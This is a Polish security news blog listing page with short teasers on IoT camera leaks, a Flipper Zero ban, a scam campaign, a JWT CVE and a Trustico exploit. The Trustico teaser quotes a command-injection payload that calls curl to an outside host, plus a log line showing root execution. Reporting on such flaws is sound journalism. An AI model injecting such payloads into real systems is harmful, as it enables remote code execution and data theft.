Niedawno pisaliśmy o wpadce Ubiquity, poprzez którą użytkownicy mogli uzyskać dostęp do konsol innych urządzeń sieciowych oraz feedów z kamer, które do nich nie należały. Wtedy powodem problemów była aktualizacja infrastruktury cloudowej producenta. W zeszły piątek podobne zdarzenie dotknęło użytkowników kamer Wyze. Pod wpisem producenta, na subreddicie r/wyzecam, niektórzy użytkownicy…
Czytaj dalej »
Kanadyjski rząd planuje zakazać sprzedaży Flippera Zero i innych podobnych urządzeń po tym jak uznano, że takie narzędzia mogą służyć do kradzieży samochodów. Kanadyjski Minister ds. Innowacji, Nauki i Przemysłu napisał na portalu X (dawniej Twitter): “Criminals have been using sophisticated tools to steal cars. And Canadians are rightfully worried….
Czytaj dalej »
Na naszą skrzynkę sekurak@sekurak.pl otrzymaliśmy od Was ciekawy przykład kampanii scamowej, która jest wzorcowym przykładem jak można ją “zepsuć” na każdym etapie. 11 września został utworzony profil firmy “App Blog” na portalu Facebook jako rzekomy profil związany z Elonem Muskiem, który „otworzył swoją działalność w Polsce i zachęca do zarabiania…
Czytaj dalej »
Producent tego urządzenia (Footfallcam) reklamuje się jako: World’s No.1 People Counting System (…) Best Selling People Counter in 2019 Ale zostawmy marketing na boku i przejdźmy do tego co lubimy najbardziej – tutaj ciekawy wątek (w zasadzie cały artykuł :) w formie powiązanych tweetów: Otóż badacz rozbebeszył urządzenie… ale jeszcze…
Czytaj dalej »
Chodzi o włoski FinecoBank – podają oni kilka zasad tworzenia dobrego hasła. I na koniec tych rad prawdziwa torpeda: inseriscila su google se ti restituce meno di 10 risultati significa che e una buona password w wolnym tłumaczeniu: a teraz drogie misie wygooglujcie swoje hasło żeby sprawdzić czy jest OK w…
Czytaj dalej »
Jeśli ktoś zna tematykę JWT (JSON Web Token), to wie że aby uniemożliwić postronnym osobom modyfikacje zawartości tokena (payload), używany jest podpis. Bez weryfikacji podpisu każdy mógłby wygenerować dowolny token i serwer go zaakceptuje. Czyli np. dostajemy bezproblemowo dostęp do funkcji administracyjnych czy innych ciekawych danych. Zobaczmy więc na podatność CVE-2019-7644:…
Czytaj dalej »
Chodzi o Trustico, który dostarczał certyfikaty SSL m.in. „pechowemu” Equifax. Jak wyglądał exploit dający roota? Banalnie – w miejscu gdzie sprawdzaliśmy domenę wystarczyło wpisać: $(curl https://domain/`id`) Efekt? Porażający, bo poza wykonaniem kodu, widać że wykonuje się on jako root: 35.190.140.214 – [01/Mar/2018:09:52:14 -0500] „GET /uid=0(root) HTTP/1.1” 404 209 „-” „curl/7.29.0”…
Czytaj dalej »
